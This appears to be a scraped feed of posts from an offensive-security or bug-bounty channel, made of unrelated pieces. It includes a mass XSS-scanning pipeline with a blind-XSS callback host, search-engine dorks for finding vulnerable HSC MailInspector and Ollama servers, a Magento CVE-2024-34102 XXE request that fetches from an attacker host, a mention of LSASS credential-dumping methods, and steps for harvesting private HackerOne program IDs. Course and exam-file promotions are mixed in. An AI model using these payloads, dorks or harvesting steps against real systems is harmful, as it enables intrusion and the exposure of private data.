subfinder -dL domainlist1.txt | dnsx | shuf | (gau || hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|noscript|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter
Methods for Dump LSASS.pdf
33.4 MB
Hunter: web.noscript=="..:: HSC MailInspector ::.."
FOFA: noscript=="..:: HSC MailInspector ::.."
🚨CVE-2024-34470: Path Traversal vulnerability in HSC Mailinspector! #computersecurity #cybersec
🚨CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!👉An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2....
💥 Registration Open for July Batch: Extreme Web Application Penetration Testing 💥
⚠️ Slots Remaining 4
💯Registration Link: https://lnkd.in/g7MjfrXG
Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
🖥 Starts: July Mid, 2024
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
⏸ Mode: Online | Language: English
🔗 Course Module: https://lnkd.in/gfZbBCFn
ceh-v12-exam-set.pdf
1.6 MB
https://wa.me/message/NQLPOBIAEFDBN1
Looking for someone who can contribute to the next 30-day Bug Bounty Challenge.
Similar to this https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability
⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit it to overwrite arbitrary files on the server, ultimately leading to remote code execution.
🔥PoC: https://lnkd.in/gk6Wvq_P
💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command: echo 'https://hackerone.com/' | waybackurls > lists.txt (make sure you have waybackurls installed on your attackbox)
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission IDs of many random private programs; you can check them by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino